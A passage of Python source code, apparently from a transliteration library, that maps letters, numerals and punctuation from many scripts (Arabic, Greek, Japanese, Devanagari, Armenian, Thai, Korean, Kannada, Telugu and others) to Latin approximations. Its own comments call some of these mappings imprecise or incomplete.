u\"عﻉﻊﻌﻋ\":\n self.trans[char] = u\"'\"\n for char in u\"غﻍﻎﻐﻏ\":\n self.trans[char] = u\"gh\"\n for char in u\"فﻑﻒﻔﻓ\":\n self.trans[char] = u\"f\"\n for char in u\"قﻕﻖﻘﻗ\":\n self.trans[char] = u\"q\"\n for char in u\"كﻙﻚﻜﻛک\":\n self.trans[char] = u\"k\"\n for char in u\"لﻝﻞﻠﻟ\":\n self.trans[char] = u\"l\"\n for char in u\"مﻡﻢﻤﻣ\":\n self.trans[char] = u\"m\"\n for char in u\"نﻥﻦﻨﻧ\":\n self.trans[char] = u\"n\"\n for char in u\"هﻩﻪﻬﻫ\":\n self.trans[char] = u\"h\"\n for char in u\"وﻭﻮ\":\n self.trans[char] = u\"w\"\n for char in u\"یيﻱﻲﻴﻳ\":\n self.trans[char] = u\"y\"\n # Arabic - additional letters, modified letters and ligatures\n self.trans[u\"ﺀ\"] = u\"'\"\n for char in u\"آﺁﺂ\":\n self.trans[char] = u\"'a\"\n for char in u\"ةﺓﺔ\":\n self.trans[char] = u\"th\"\n for char in u\"ىﻯﻰ\":\n self.trans[char] = u\"á\"\n for char in u\"یﯼﯽﯿﯾ\":\n self.trans[char] = u\"y\"\n self.trans[u\"؟\"] = u\"?\"\n # Arabic - ligatures\n for char in u\"ﻻﻼ\":\n self.trans[char] = u\"la\"\n self.trans[u\"ﷲ\"] = u\"llah\"\n for char in u\"إأ\":\n self.trans[char] = u\"a'\"\n self.trans[u\"ؤ\"] = u\"w'\"\n self.trans[u\"ئ\"] = u\"y'\"\n for char in u\"◌◌\":\n self.trans[char] = u\"\" # indicates absence of vowels\n # Arabic vowels\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"i\"\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"iy\"\n # Arab numerals\n for char in u\"٠۰\":\n self.trans[char] = u\"0\"\n for char in u\"١۱\":\n self.trans[char] = u\"1\"\n for char in u\"٢۲\":\n self.trans[char] = u\"2\"\n for char in u\"٣۳\":\n self.trans[char] = u\"3\"\n for char in u\"٤۴\":\n self.trans[char] = u\"4\"\n for char in u\"٥۵\":\n self.trans[char] = u\"5\"\n for char in u\"٦۶\":\n self.trans[char] = u\"6\"\n for char in u\"٧۷\":\n self.trans[char] = u\"7\"\n for char in u\"٨۸\":\n self.trans[char] = u\"8\"\n for char in u\"٩۹\":\n self.trans[char] = u\"9\"\n # Perso-Arabic\n for char in u\"پﭙﭙپ\":\n self.trans[char] = u\"p\"\n for char in u\"چچچچ\":\n self.trans[char] = u\"ch\"\n for char in u\"ژژ\":\n self.trans[char] = u\"zh\"\n for char in u\"گﮔﮕﮓ\":\n self.trans[char] = u\"g\"\n\n # Greek\n self.trans.update({u\"Α\": u\"A\", u\"α\": u\"a\", u\"Β\": u\"B\", u\"β\": u\"b\", u\"Γ\": u\"G\",\n u\"γ\": u\"g\", u\"Δ\": u\"D\", u\"δ\": u\"d\", u\"Ε\": u\"E\", u\"ε\": u\"e\",\n u\"Ζ\": u\"Z\", u\"ζ\": u\"z\", u\"Η\": u\"I\", u\"η\": u\"i\", u\"θ\": u\"th\",\n u\"Θ\": u\"Th\", u\"Ι\": u\"I\", u\"ι\": u\"i\", u\"Κ\": u\"K\", u\"κ\": u\"k\",\n u\"Λ\": u\"L\", u\"λ\": u\"l\", u\"Μ\": u\"M\", u\"μ\": u\"m\", u\"Ν\": u\"N\",\n u\"ν\": u\"n\", u\"Ξ\": u\"X\", u\"ξ\": u\"x\", u\"Ο\": u\"O\", u\"ο\": u\"o\",\n u\"Π\": u\"P\", u\"π\": u\"p\", u\"Ρ\": u\"R\", u\"ρ\": u\"r\", u\"Σ\": u\"S\",\n u\"σ\": u\"s\", u\"ς\": u\"s\", u\"Τ\": u\"T\", u\"τ\": u\"t\", u\"Υ\": u\"Y\",\n u\"υ\": u\"y\", u\"Φ\": u\"F\", u\"φ\": u\"f\", u\"Ψ\": u\"Ps\", u\"ψ\": u\"ps\",\n u\"Ω\": u\"O\", u\"ω\": u\"o\", u\"ϗ\": u\"&\", u\"Ϛ\": u\"St\", u\"ϛ\": u\"st\",\n u\"Ϙ\": u\"Q\", u\"Ϟ\": u\"Q\", u\"ϙ\": u\"q\", u\"ϟ\": u\"q\", u\"Ϻ\": u\"S\",\n u\"ϻ\": u\"s\", u\"Ϡ\": u\"Ss\", u\"ϡ\": u\"ss\", u\"Ϸ\": u\"Sh\", u\"ϸ\": u\"sh\",\n u\"·\": u\":\", u\"Ά\": u\"Á\", u\"ά\": u\"á\", u\"Έ\": u\"É\", u\"Ή\": u\"É\",\n u\"έ\": u\"é\", u\"ή\": u\"é\", u\"Ί\": u\"Í\", u\"ί\": u\"í\", u\"Ϊ\": u\"Ï\",\n u\"ϊ\": u\"ï\", u\"ΐ\": u\"ï\", u\"Ό\": u\"Ó\", u\"ό\": u\"ó\", u\"Ύ\": u\"Ý\",\n u\"ύ\": u\"ý\", u\"Ϋ\": u\"Y\", u\"ϋ\": u\"ÿ\", u\"ΰ\": u\"ÿ\", u\"Ώ\": u\"Ó\",\n u\"ώ\": u\"ó\"})\n\n # Japanese (katakana and hiragana)\n for char in u\"アァあ\":\n self.trans[char] = u\"a\"\n for char in u\"イィい\":\n self.trans[char] = u\"i\"\n for char in u\"ウう\":\n self.trans[char] = u\"u\"\n for char in u\"エェえ\":\n self.trans[char] = u\"e\"\n for char in u\"オォお\":\n self.trans[char] = u\"o\"\n for char in u\"ャや\":\n self.trans[char] = u\"ya\"\n for char in u\"ュゆ\":\n self.trans[char] = u\"yu\"\n for char in u\"ョよ\":\n self.trans[char] = u\"yo\"\n for char in u\"カか\":\n self.trans[char] = u\"ka\"\n for char in u\"キき\":\n self.trans[char] = u\"ki\"\n for char in u\"クく\":\n self.trans[char] = u\"ku\"\n for char in u\"ケけ\":\n self.trans[char] = u\"ke\"\n for char in u\"コこ\":\n self.trans[char] = u\"ko\"\n for char in u\"サさ\":\n self.trans[char] = u\"sa\"\n for char in u\"シし\":\n self.trans[char] = u\"shi\"\n for char in u\"スす\":\n self.trans[char] = u\"su\"\n for char in u\"セせ\":\n self.trans[char] = u\"se\"\n for char in u\"ソそ\":\n self.trans[char] = u\"so\"\n for char in u\"タた\":\n self.trans[char] = u\"ta\"\n for char in u\"チち\":\n self.trans[char] = u\"chi\"\n for char in u\"ツつ\":\n self.trans[char] = u\"tsu\"\n for char in u\"テて\":\n self.trans[char] = u\"te\"\n for char in u\"トと\":\n self.trans[char] = u\"to\"\n for char in u\"ナな\":\n self.trans[char] = u\"na\"\n for char in u\"ニに\":\n self.trans[char] = u\"ni\"\n for char in u\"ヌぬ\":\n self.trans[char] = u\"nu\"\n for char in u\"ネね\":\n self.trans[char] = u\"ne\"\n for char in u\"ノの\":\n self.trans[char] = u\"no\"\n for char in u\"ハは\":\n self.trans[char] = u\"ha\"\n for char in u\"ヒひ\":\n self.trans[char] = u\"hi\"\n for char in u\"フふ\":\n self.trans[char] = u\"fu\"\n for char in u\"ヘへ\":\n self.trans[char] = u\"he\"\n for char in u\"ホほ\":\n self.trans[char] = u\"ho\"\n for char in u\"マま\":\n self.trans[char] = u\"ma\"\n for char in u\"ミみ\":\n self.trans[char] = u\"mi\"\n for char in u\"ムむ\":\n self.trans[char] = u\"mu\"\n for char in u\"メめ\":\n self.trans[char] = u\"me\"\n for char in u\"モも\":\n self.trans[char] = u\"mo\"\n for char in u\"ラら\":\n self.trans[char] = u\"ra\"\n for char in u\"リり\":\n self.trans[char] = u\"ri\"\n for char in u\"ルる\":\n self.trans[char] = u\"ru\"\n for char in u\"レれ\":\n self.trans[char] = u\"re\"\n for char in u\"ロろ\":\n self.trans[char] = u\"ro\"\n for char in u\"ワわ\":\n self.trans[char] = u\"wa\"\n for char in u\"ヰゐ\":\n self.trans[char] = u\"wi\"\n for char in u\"ヱゑ\":\n self.trans[char] = u\"we\"\n for char in u\"ヲを\":\n self.trans[char] = u\"wo\"\n for char in u\"ンん\":\n self.trans[char] = u\"n\"\n for char in u\"ガが\":\n self.trans[char] = u\"ga\"\n for char in u\"ギぎ\":\n self.trans[char] = u\"gi\"\n for char in u\"グぐ\":\n self.trans[char] = u\"gu\"\n for char in u\"ゲげ\":\n self.trans[char] = u\"ge\"\n for char in u\"ゴご\":\n self.trans[char] = u\"go\"\n for char in u\"ザざ\":\n self.trans[char] = u\"za\"\n for char in u\"ジじ\":\n self.trans[char] = u\"ji\"\n for char in u\"ズず\":\n self.trans[char] = u\"zu\"\n for char in u\"ゼぜ\":\n self.trans[char] = u\"ze\"\n for char in u\"ゾぞ\":\n self.trans[char] = u\"zo\"\n for char in u\"ダだ\":\n self.trans[char] = u\"da\"\n for char in u\"ヂぢ\":\n self.trans[char] = u\"dji\"\n for char in u\"ヅづ\":\n self.trans[char] = u\"dzu\"\n for char in u\"デで\":\n self.trans[char] = u\"de\"\n for char in u\"ドど\":\n self.trans[char] = u\"do\"\n for char in u\"バば\":\n self.trans[char] = u\"ba\"\n for char in u\"ビび\":\n self.trans[char] = u\"bi\"\n for char in u\"ブぶ\":\n self.trans[char] = u\"bu\"\n for char in u\"ベべ\":\n self.trans[char] = u\"be\"\n for char in u\"ボぼ\":\n self.trans[char] = u\"bo\"\n for char in u\"パぱ\":\n self.trans[char] = u\"pa\"\n for char in u\"ピぴ\":\n self.trans[char] = u\"pi\"\n for char in u\"プぷ\":\n self.trans[char] = u\"pu\"\n for char in u\"ペぺ\":\n self.trans[char] = u\"pe\"\n for char in u\"ポぽ\":\n self.trans[char] = u\"po\"\n for char in u\"ヴゔ\":\n self.trans[char] = u\"vu\"\n self.trans[u\"ヷ\"] = u\"va\"\n self.trans[u\"ヸ\"] = u\"vi\"\n self.trans[u\"ヹ\"] = u\"ve\"\n self.trans[u\"ヺ\"] = u\"vo\"\n\n # Japanese and Chinese punctuation and typography\n for char in u\"・·\":\n self.trans[char] = u\" \"\n for char in u\"〃『』《》\":\n self.trans[char] = u'\"'\n for char in u\"「」〈〉〘〙〚〛\":\n self.trans[char] = u\"'\"\n for char in u\"(〔\":\n self.trans[char] = u\"(\"\n for char in u\")〕\":\n self.trans[char] = u\")\"\n for char in u\"[【〖\":\n self.trans[char] = u\"[\"\n for char in u\"]】〗\":\n self.trans[char] = u\"]\"\n self.trans['{'] = '{'\n self.trans['}'] = '}'\n self.trans['っ'] = ':'\n self.trans['ー'] = 'h'\n self.trans['゛'] = \"'\"\n self.trans['゜'] = 'p'\n self.trans['。'] = '. '\n self.trans['、'] = ', '\n self.trans['・'] = ' '\n self.trans['〆'] = 'shime'\n self.trans['〜'] = '-'\n self.trans['…'] = '...'\n self.trans['‥'] = '..'\n self.trans['ヶ'] = 'months'\n for char in u\"•◦\":\n self.trans[char] = u\"_\"\n for char in u\"※*\":\n self.trans[char] = u\"*\"\n self.trans['Ⓧ'] = '(X)'\n self.trans['Ⓨ'] = '(Y)'\n self.trans['!'] = '!'\n self.trans['?'] = '?'\n self.trans[';'] = ';'\n self.trans[':'] = ':'\n self.trans['。'] = '.'\n for char in u\",、\":\n self.trans[char] = u\",\"\n\n # Georgian\n self.trans['ა'] = 'a'\n self.trans['ბ'] = 'b'\n self.trans['გ'] = 'g'\n self.trans['დ'] = 'd'\n for char in u\"ეჱ\":\n self.trans[char] = u\"e\"\n self.trans['ვ'] = 'v'\n self.trans['ზ'] = 'z'\n self.trans['თ'] = 'th'\n self.trans['ი'] = 'i'\n self.trans['კ'] = 'k'\n self.trans['ლ'] = 'l'\n self.trans['მ'] = 'm'\n self.trans['ნ'] = 'n'\n self.trans['ო'] = 'o'\n self.trans['პ'] = 'p'\n self.trans['ჟ'] = 'zh'\n self.trans['რ'] = 'r'\n self.trans['ს'] = 's'\n self.trans['ტ'] = 't'\n self.trans['უ'] = 'u'\n self.trans['ფ'] = 'ph'\n self.trans['ქ'] = 'q'\n self.trans['ღ'] = 'gh'\n for char in u\"ყ\":\n self.trans[char] = u\"q'\"\n self.trans['შ'] = 'sh'\n self.trans['ჩ'] = 'ch'\n self.trans['ც'] = 'ts'\n self.trans['ძ'] = 'dz'\n for char in u\"წ\":\n self.trans[char] = u\"ts'\"\n for char in u\"ჭ\":\n self.trans[char] = u\"ch'\"\n self.trans['ხ'] = 'kh'\n self.trans['ჯ'] = 'j'\n self.trans['ჰ'] = 'h'\n self.trans['ჳ'] = 'w'\n self.trans['ჵ'] = 'o'\n self.trans['ჶ'] = 'f'\n\n # Devanagari\n for char in u\"पप\":\n self.trans[char] = u\"p\"\n self.trans['अ'] = 'a'\n for char in u\"आा\":\n self.trans[char] = u\"aa\"\n self.trans['प'] = 'pa'\n for char in u\"इि\":\n self.trans[char] = u\"i\"\n for char in u\"ईी\":\n self.trans[char] = u\"ii\"\n for char in u\"उु\":\n self.trans[char] = u\"u\"\n for char in u\"ऊू\":\n self.trans[char] = u\"uu\"\n for char in u\"एे\":\n self.trans[char] = u\"e\"\n for char in u\"ऐै\":\n self.trans[char] = u\"ai\"\n for char in u\"ओो\":\n self.trans[char] = u\"o\"\n for char in u\"औौ\":\n self.trans[char] = u\"au\"\n for char in u\"ऋृर\":\n self.trans[char] = u\"r\"\n for char in u\"ॠॄ\":\n self.trans[char] = u\"rr\"\n for char in u\"ऌॢल\":\n self.trans[char] = u\"l\"\n for char in u\"ॡॣ\":\n self.trans[char] = u\"ll\"\n self.trans['क'] = 'k'\n self.trans['ख'] = 'kh'\n self.trans['ग'] = 'g'\n self.trans['घ'] = 'gh'\n self.trans['ङ'] = 'ng'\n self.trans['च'] = 'c'\n self.trans['छ'] = 'ch'\n self.trans['ज'] = 'j'\n self.trans['झ'] = 'jh'\n self.trans['ञ'] = 'ñ'\n for char in u\"टत\":\n self.trans[char] = u\"t\"\n for char in u\"ठथ\":\n self.trans[char] = u\"th\"\n for char in u\"डद\":\n self.trans[char] = u\"d\"\n for char in u\"ढध\":\n self.trans[char] = u\"dh\"\n for char in u\"णन\":\n self.trans[char] = u\"n\"\n self.trans['फ'] = 'ph'\n self.trans['ब'] = 'b'\n self.trans['भ'] = 'bh'\n self.trans['म'] = 'm'\n self.trans['य'] = 'y'\n self.trans['व'] = 'v'\n self.trans['श'] = 'sh'\n for char in u\"षस\":\n self.trans[char] = u\"s\"\n self.trans['ह'] = 'h'\n self.trans['क'] = 'x'\n self.trans['त'] = 'tr'\n self.trans['ज'] = 'gj'\n for char in u\"क़\":\n self.trans[char] = u\"q\"\n self.trans['फ'] = 'f'\n self.trans['ख'] = 'hh'\n self.trans['H'] = 'gh'\n self.trans['ज'] = 'z'\n for char in u\"डढ\":\n self.trans[char] = u\"r\"\n # Devanagari ligatures (possibly incomplete and/or incorrect)\n for char in u\"ख्\":\n self.trans[char] = u\"khn\"\n self.trans['त'] = 'tn'\n for char in u\"द्\":\n self.trans[char] = u\"dn\"\n self.trans['श'] = 'cn'\n for char in u\"ह्\":\n self.trans[char] = u\"fn\"\n for char in u\"अँ\":\n self.trans[char] = u\"m\"\n for char in u\"॒॑\":\n self.trans[char] = u\"\"\n self.trans['०'] = '0'\n self.trans['१'] = '1'\n self.trans['२'] = '2'\n self.trans['३'] = '3'\n self.trans['४'] = '4'\n self.trans['५'] = '5'\n self.trans['६'] = '6'\n self.trans['७'] = '7'\n self.trans['८'] = '8'\n self.trans['९'] = '9'\n\n # Armenian\n self.trans['Ա'] = 'A'\n self.trans['ա'] = 'a'\n self.trans['Բ'] = 'B'\n self.trans['բ'] = 'b'\n self.trans['Գ'] = 'G'\n self.trans['գ'] = 'g'\n self.trans['Դ'] = 'D'\n self.trans['դ'] = 'd'\n self.trans['Ե'] = 'Je'\n self.trans['ե'] = 'e'\n self.trans['Զ'] = 'Z'\n self.trans['զ'] = 'z'\n self.trans['Է'] = 'É'\n self.trans['է'] = 'é'\n self.trans['Ը'] = 'Ë'\n self.trans['ը'] = 'ë'\n self.trans['Թ'] = 'Th'\n self.trans['թ'] = 'th'\n self.trans['Ժ'] = 'Zh'\n self.trans['ժ'] = 'zh'\n self.trans['Ի'] = 'I'\n self.trans['ի'] = 'i'\n self.trans['Լ'] = 'L'\n self.trans['լ'] = 'l'\n self.trans['Խ'] = 'Ch'\n self.trans['խ'] = 'ch'\n self.trans['Ծ'] = 'Ts'\n self.trans['ծ'] = 'ts'\n self.trans['Կ'] = 'K'\n self.trans['կ'] = 'k'\n self.trans['Հ'] = 'H'\n self.trans['հ'] = 'h'\n self.trans['Ձ'] = 'Dz'\n self.trans['ձ'] = 'dz'\n self.trans['Ղ'] = 'R'\n self.trans['ղ'] = 'r'\n self.trans['Ճ'] = 'Cz'\n self.trans['ճ'] = 'cz'\n self.trans['Մ'] = 'M'\n self.trans['մ'] = 'm'\n self.trans['Յ'] = 'J'\n self.trans['յ'] = 'j'\n self.trans['Ն'] = 'N'\n self.trans['ն'] = 'n'\n self.trans['Շ'] = 'S'\n self.trans['շ'] = 's'\n self.trans['Շ'] = 'Vo'\n self.trans['շ'] = 'o'\n self.trans['Չ'] = 'Tsh'\n self.trans['չ'] = 'tsh'\n self.trans['Պ'] = 'P'\n self.trans['պ'] = 'p'\n self.trans['Ջ'] = 'Dz'\n self.trans['ջ'] = 'dz'\n self.trans['Ռ'] = 'R'\n self.trans['ռ'] = 'r'\n self.trans['Ս'] = 'S'\n self.trans['ս'] = 's'\n self.trans['Վ'] = 'V'\n self.trans['վ'] = 'v'\n for char in u\"Տ\":\n self.trans[char] = u\"T'\"\n for char in u\"տ\":\n self.trans[char] = u\"t'\"\n self.trans['Ր'] = 'R'\n self.trans['ր'] = 'r'\n self.trans['Ց'] = 'Tsh'\n self.trans['ց'] = 'tsh'\n self.trans['Ւ'] = 'V'\n self.trans['ւ'] = 'v'\n self.trans['Փ'] = 'Ph'\n self.trans['փ'] = 'ph'\n self.trans['Ք'] = 'Kh'\n self.trans['ք'] = 'kh'\n self.trans['Օ'] = 'O'\n self.trans['օ'] = 'o'\n self.trans['Ֆ'] = 'F'\n self.trans['ֆ'] = 'f'\n self.trans['և'] = '&'\n self.trans['՟'] = '.'\n self.trans['՞'] = '?'\n self.trans['՝'] = ';'\n self.trans['՛'] = ''\n\n # Tamil\n for char in u\"க்\":\n self.trans[char] = u\"k\"\n for char in u\"ஙண்ந்ன்\":\n self.trans[char] = u\"n\"\n self.trans['ச'] = 'c'\n for char in u\"ஞ்\":\n self.trans[char] = u\"ñ\"\n for char in u\"ட்\":\n self.trans[char] = u\"th\"\n self.trans['த'] = 't'\n self.trans['ப'] = 'p'\n for char in u\"ம்\":\n self.trans[char] = u\"m\"\n for char in u\"ய்\":\n self.trans[char] = u\"y\"\n for char in u\"ர்ழ்ற\":\n self.trans[char] = u\"r\"\n for char in u\"ல்ள\":\n self.trans[char] = u\"l\"\n for char in u\"வ்\":\n self.trans[char] = u\"v\"\n self.trans['ஜ'] = 'j'\n self.trans['ஷ'] = 'sh'\n self.trans['ஸ'] = 's'\n self.trans['ஹ'] = 'h'\n for char in u\"க்ஷ\":\n self.trans[char] = u\"x\"\n self.trans['அ'] = 'a'\n self.trans['ஆ'] = 'aa'\n self.trans['இ'] = 'i'\n self.trans['ஈ'] = 'ii'\n self.trans['உ'] = 'u'\n self.trans['ஊ'] = 'uu'\n self.trans['எ'] = 'e'\n self.trans['ஏ'] = 'ee'\n self.trans['ஐ'] = 'ai'\n self.trans['ஒ'] = 'o'\n self.trans['ஓ'] = 'oo'\n self.trans['ஔ'] = 'au'\n self.trans['ஃ'] = ''\n\n # Bengali\n self.trans['অ'] = 'ô'\n for char in u\"আা\":\n self.trans[char] = u\"a\"\n for char in u\"ইিঈী\":\n self.trans[char] = u\"i\"\n for char in u\"উুঊূ\":\n self.trans[char] = u\"u\"\n for char in u\"ঋৃ\":\n self.trans[char] = u\"ri\"\n for char in u\"এেয়\":\n self.trans[char] = u\"e\"\n for char in u\"ঐৈ\":\n self.trans[char] = u\"oi\"\n for char in u\"ওো\":\n self.trans[char] = u\"o\"\n for char in u\"ঔৌ\":\n self.trans[char] = \"ou\"\n self.trans['্'] = ''\n self.trans['ৎ'] = 't'\n self.trans['ং'] = 'n'\n self.trans['ঃ'] = 'h'\n self.trans['ঁ'] = 'ñ'\n self.trans['ক'] = 'k'\n self.trans['খ'] = 'kh'\n self.trans['গ'] = 'g'\n self.trans['ঘ'] = 'gh'\n self.trans['ঙ'] = 'ng'\n self.trans['চ'] = 'ch'\n self.trans['ছ'] = 'chh'\n self.trans['জ'] = 'j'\n self.trans['ঝ'] = 'jh'\n self.trans['ঞ'] = 'n'\n for char in u\"টত\":\n self.trans[char] = u\"t\"\n for char in u\"ঠথ\":\n self.trans[char] = u\"th\"\n for char in u\"ডদ\":\n self.trans[char] = u\"d\"\n for char in u\"ঢধ\":\n self.trans[char] = u\"dh\"\n for char in u\"ণন\":\n self.trans[char] = u\"n\"\n self.trans['প'] = 'p'\n self.trans['ফ'] = 'ph'\n self.trans['ব'] = 'b'\n self.trans['ভ'] = 'bh'\n self.trans['ম'] = 'm'\n self.trans['য'] = 'dzh'\n self.trans['র'] = 'r'\n self.trans['ল'] = 'l'\n self.trans['শ'] = 's'\n self.trans['হ'] = 'h'\n for char in u\"য়\":\n self.trans[char] = u\"-\"\n for char in u\"ড়\":\n self.trans[char] = u\"r\"\n self.trans['ঢ'] = 'rh'\n self.trans['০'] = '0'\n self.trans['১'] = '1'\n self.trans['২'] = '2'\n self.trans['৩'] = '3'\n self.trans['৪'] = '4'\n self.trans['৫'] = '5'\n self.trans['৬'] = '6'\n self.trans['৭'] = '7'\n self.trans['৮'] = '8'\n self.trans['৯'] = '9'\n\n # Thai (because of complications of the alphabet, self.transliterations\n # are very imprecise here)\n self.trans['ก'] = 'k'\n for char in u\"ขฃคฅฆ\":\n self.trans[char] = u\"kh\"\n self.trans['ง'] = 'ng'\n for char in u\"จฉชฌ\":\n self.trans[char] = u\"ch\"\n for char in u\"ซศษส\":\n self.trans[char] = u\"s\"\n for char in u\"ญย\":\n self.trans[char] = u\"y\"\n for char in u\"ฎด\":\n self.trans[char] = u\"d\"\n for char in u\"ฏต\":\n self.trans[char] = u\"t\"\n for char in u\"ฐฑฒถทธ\":\n self.trans[char] = u\"th\"\n for char in u\"ณน\":\n self.trans[char] = u\"n\"\n self.trans['บ'] = 'b'\n self.trans['ป'] = 'p'\n for char in u\"ผพภ\":\n self.trans[char] = u\"ph\"\n for char in u\"ฝฟ\":\n self.trans[char] = u\"f\"\n self.trans['ม'] = 'm'\n self.trans['ร'] = 'r'\n self.trans['ฤ'] = 'rue'\n self.trans['ๅ'] = ':'\n for char in u\"ลฬ\":\n self.trans[char] = u\"l\"\n self.trans['ฦ'] = 'lue'\n self.trans['ว'] = 'w'\n for char in u\"หฮ\":\n self.trans[char] = u\"h\"\n self.trans['อ'] = ''\n self.trans['ร'] = 'ü'\n self.trans['ว'] = 'ua'\n for char in u\"อวโิ\":\n self.trans[char] = u\"o\"\n for char in u\"ะัา\":\n self.trans[char] = u\"a\"\n self.trans['ว'] = 'u'\n self.trans['ำ'] = 'am'\n self.trans['ิ'] = 'i'\n self.trans['ี'] = 'i:'\n self.trans['ึ'] = 'ue'\n self.trans['ื'] = 'ue:'\n self.trans['ุ'] = 'u'\n self.trans['ู'] = 'u:'\n for char in u\"เ็\":\n self.trans[char] = u\"e\"\n self.trans['แ'] = 'ae'\n for char in u\"ใไ\":\n self.trans[char] = u\"ai\"\n for char in u\"่้๊๋็์\":\n self.trans[char] = u\"\"\n self.trans['ฯ'] = '.'\n self.trans['ๆ'] = '(2)'\n\n # Korean (Revised Romanization system within possible, incomplete)\n self.trans['국'] = 'guk'\n self.trans['명'] = 'myeong'\n self.trans['검'] = 'geom'\n self.trans['타'] = 'ta'\n self.trans['분'] = 'bun'\n self.trans['사'] = 'sa'\n self.trans['류'] = 'ryu'\n self.trans['포'] = 'po'\n self.trans['르'] = 'reu'\n self.trans['투'] = 'tu'\n self.trans['갈'] = 'gal'\n self.trans['어'] = 'eo'\n self.trans['노'] = 'no'\n self.trans['웨'] = 'we'\n self.trans['이'] = 'i'\n self.trans['라'] = 'ra'\n self.trans['틴'] = 'tin'\n self.trans['루'] = 'ru'\n self.trans['마'] = 'ma'\n self.trans['니'] = 'ni'\n self.trans['아'] = 'a'\n self.trans['독'] = 'dok'\n self.trans['일'] = 'il'\n self.trans['모'] = 'mo'\n self.trans['크'] = 'keu'\n self.trans['샤'] = 'sya'\n self.trans['영'] = 'yeong'\n self.trans['불'] = 'bul'\n self.trans['가'] = 'ga'\n self.trans['리'] = 'ri'\n self.trans['그'] = 'geu'\n self.trans['지'] = 'ji'\n self.trans['야'] = 'ya'\n self.trans['바'] = 'ba'\n self.trans['슈'] = 'syu'\n self.trans['키'] = 'ki'\n self.trans['프'] = 'peu'\n self.trans['랑'] = 'rang'\n self.trans['스'] = 'seu'\n self.trans['로'] = 'ro'\n self.trans['메'] = 'me'\n self.trans['역'] = 'yeok'\n self.trans['도'] = 'do'\n\n # Kannada\n self.trans[u\"ಅ\"] = u\"a\"\n for char in u\"ಆಾ\":\n self.trans[char] = u\"aa\"\n for char in u\"ಇಿ\":\n self.trans[char] = u\"i\"\n for char in u\"ಈೀ\":\n self.trans[char] = u\"ii\"\n for char in u\"ಉು\":\n self.trans[char] = u\"u\"\n for char in u\"ಊೂ\":\n self.trans[char] = u\"uu\"\n for char in u\"ಋೂ\":\n self.trans[char] = u\"r'\"\n for char in u\"ಎೆ\":\n self.trans[char] = u\"e\"\n for char in u\"ಏೇ\":\n self.trans[char] = u\"ee\"\n for char in u\"ಐೈ\":\n self.trans[char] = u\"ai\"\n for char in u\"ಒೊ\":\n self.trans[char] = u\"o\"\n for char in u\"ಓೋ\":\n self.trans[char] = u\"oo\"\n for char in u\"ಔೌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ಂ\"] = u\"m'\"\n self.trans[u\"ಃ\"] = u\"h'\"\n self.trans[u\"ಕ\"] = u\"k\"\n self.trans[u\"ಖ\"] = u\"kh\"\n self.trans[u\"ಗ\"] = u\"g\"\n self.trans[u\"ಘ\"] = u\"gh\"\n self.trans[u\"ಙ\"] = u\"ng\"\n self.trans[u\"ಚ\"] = u\"c\"\n self.trans[u\"ಛ\"] = u\"ch\"\n self.trans[u\"ಜ\"] = u\"j\"\n self.trans[u\"ಝ\"] = u\"ny\"\n self.trans[u\"ಟ\"] = u\"tt\"\n self.trans[u\"ಠ\"] = u\"tth\"\n self.trans[u\"ಡ\"] = u\"dd\"\n self.trans[u\"ಢ\"] = u\"ddh\"\n self.trans[u\"ಣ\"] = u\"nn\"\n self.trans[u\"ತ\"] = u\"t\"\n self.trans[u\"ಥ\"] = u\"th\"\n self.trans[u\"ದ\"] = u\"d\"\n self.trans[u\"ಧ\"] = u\"dh\"\n self.trans[u\"ನ\"] = u\"n\"\n self.trans[u\"ಪ\"] = u\"p\"\n self.trans[u\"ಫ\"] = u\"ph\"\n self.trans[u\"ಬ\"] = u\"b\"\n self.trans[u\"ಭ\"] = u\"bh\"\n self.trans[u\"ಮ\"] = u\"m\"\n self.trans[u\"ಯ\"] = u\"y\"\n self.trans[u\"ರ\"] = u\"r\"\n self.trans[u\"ಲ\"] = u\"l\"\n self.trans[u\"ವ\"] = u\"v\"\n self.trans[u\"ಶ\"] = u\"sh\"\n self.trans[u\"ಷ\"] = u\"ss\"\n self.trans[u\"ಸ\"] = u\"s\"\n self.trans[u\"ಹ\"] = u\"h\"\n self.trans[u\"ಳ\"] = u\"ll\"\n self.trans[u\"೦\"] = u\"0\"\n self.trans[u\"೧\"] = u\"1\"\n self.trans[u\"೨\"] = u\"2\"\n self.trans[u\"೩\"] = u\"3\"\n self.trans[u\"೪\"] = u\"4\"\n self.trans[u\"೫\"] = u\"5\"\n self.trans[u\"೬\"] = u\"6\"\n self.trans[u\"೭\"] = u\"7\"\n self.trans[u\"೮\"] = u\"8\"\n self.trans[u\"೯\"] = u\"9\"\n # Telugu\n self.trans['అ'] = 'a'\n for char in u\"ఆా\":\n self.trans[char] = u\"aa\"\n for char in u\"ఇి\":\n self.trans[char] = u\"i\"\n for char in u\"ఈీ\":\n self.trans[char] = u\"ii\"\n for char in u\"ఉు\":\n self.trans[char] = u\"u\"\n for char in u\"ఊూ\":\n self.trans[char] = u\"uu\"\n for char in u\"ఋృ\":\n self.trans[char] = u\"r'\"\n for char in u\"ౠౄ\":\n self.trans[char] = u'r\"'\n self.trans[u\"ఌ\"] = u\"l'\"\n self.trans[u\"ౡ\"] = u'l\"'\n for char in u\"ఎె\":\n self.trans[char] = u\"e\"\n for char in u\"ఏే\":\n self.trans[char] = u\"ee\"\n for char in u\"ఐై\":\n self.trans[char] = u\"ai\"\n for char in u\"ఒొ\":\n self.trans[char] = u\"o\"\n for char in u\"ఓో\":\n self.trans[char] = u\"oo\"\n for char in u\"ఔౌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ం\"] = u\"'\"\n self.trans[u\"ః\"] = u'\"'\n self.trans[u\"క\"] = u\"k\"\n self.trans[u\"ఖ\"] = u\"kh\"\n self.trans[u\"గ\"] = u\"g\"\n self.trans[u\"ఘ\"] = u\"gh\"\n self.trans[u\"ఙ\"] = u\"ng\"\n self.trans[u\"చ\"] = u\"ts\"\n self.trans[u\"ఛ\"] = u\"tsh\"\n self.trans[u\"జ\"] = u\"j\"\n self.trans[u\"ఝ\"] = u\"jh\"\n self.trans[u\"ఞ\"] = u\"ñ\"\n for char in u\"టత\":\n self.trans[char] = u\"t\"\n for char in u\"ఠథ\":\n self.trans[char] = u\"th\"\n for char in 